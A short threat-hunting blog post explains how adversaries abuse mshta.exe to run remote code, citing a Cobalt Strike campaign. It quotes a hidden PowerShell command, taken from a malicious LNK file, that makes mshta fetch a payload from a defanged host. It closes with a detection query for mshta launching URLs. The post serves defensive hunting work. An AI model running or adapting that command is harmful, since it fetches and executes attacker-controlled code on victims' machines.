342. Mshta - A Great Target for Hunting

Hello everyone!

It's Monday, so let's look at a classic (at least in my opinion) target for threat hunting - System Binary Proxy Execution: Mshta (T1218.005).

I've spotted it again looking through the report on activity cluster we track as Lone Wolf. The adversary leveraged malicious LNK files to deploy Cobalt Strike beacon.

The LNK, for example, runs the following command:

powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -Command "Start-Process mshta -ArgumentList 'hxxps://iplogger[.]cn/forensicsas.png'"

As you can see, here mshta.exe is used to access a link, which redirects to a malicious HTA file. So, for example, we can search for mshta.exe accessing suspicious links:

event_type: "processcreatewin"

AND

proc_file_path: "mshta.exe"

AND

cmdline: *http*

See you tomorrow!

Comments

Popular posts from this blog

033. Free Google Threat Intelligence Course

082. Huniting for Malicious Browser Extensions

001. The Zeltser Challenge